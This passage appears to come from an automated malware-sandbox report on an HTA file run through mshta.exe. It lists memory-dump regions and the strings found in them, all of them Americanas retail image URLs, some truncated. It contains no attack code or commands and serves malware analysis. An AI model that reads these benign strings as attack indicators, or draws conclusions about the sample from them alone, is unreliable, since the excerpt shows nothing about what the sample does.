00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006E7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-papelaria-a64647ae2a59.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772182378.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772100906.00000000093BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717099166.0000000009A8C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714211819.0000000009A89000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-suplementos-vitaminas-2e13c2882cd2.p
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771183068.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/05/02/250x260-atalho-app-mais-barato-no-app-129882
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772182378.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713650880.00000000065AC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695470306.00000000065AA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774395490.000000000A904000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668679539.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770582217.00000000092B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705796688.00000000065AB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654867106.00000000065A3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748034689.000000000A901000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/06/12/atalhos-esporte-fitness-e-lazer-5b7f212400c3
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727062236.000000000A851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771183068.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769263479.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/07/04/baixeapp-qr_desk-1-140b56c95cd2.png
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751994792.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771261740.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744706415.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/07/04/baixeapp-qr_desk-1-140b56c95cd2.png9.pngpng
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/07/04/baixeapp-qr_desk-1-140b56c95cd2.pngU
Source: mshta.exe, 00000000.00000003.2727024029.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676098598.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/08/0
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751960623.0000000006EA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006E7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769183488.0000000006EAA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/08/05/bn-tt_mercado-1-b820f7d67f0c.png
Source: mshta.exe, 00000000.00000002.2766191260.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750136023.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751960623.0000000006EA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/08/05/bn-tt_mercado-e904efa9812b.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728237084.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2765522247.0000000003342000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770103069.000000000927E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744380912.000000000336C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728542015.000000000921B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.000000000336A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.w
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772182378.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772100906.00000000093BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727062236.000000000A851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2773869837.000000000A850000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769263479.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728196280.0000000009404000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/10/16/MACROSSHome2-432x540px-cb8bf5b6c936.png
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751960623.0000000006EA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750307387.000000000AA36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774936619.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751994792.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/250x260-atalho-app-Natal-9b95a4d5fb69.png
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772182378.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713650880.00000000065AC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695470306.00000000065AA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726812852.0000000009360000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705796688.00000000065AB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654867106.00000000065A3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717171158.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/250x260-atalho-app-enfeites-de-natal-e13cbf8
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751994792.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771261740.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/destaque-desk-1250x313px-Natal-f25ef34312d3.
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2659343990.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717207102.0000000009A5F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744380912.000000000336C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.000000000336A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695409967.0000000009A5D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750683255.0000000003370000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/destaque-mobile-648x324px-Natal-0044175eebbb
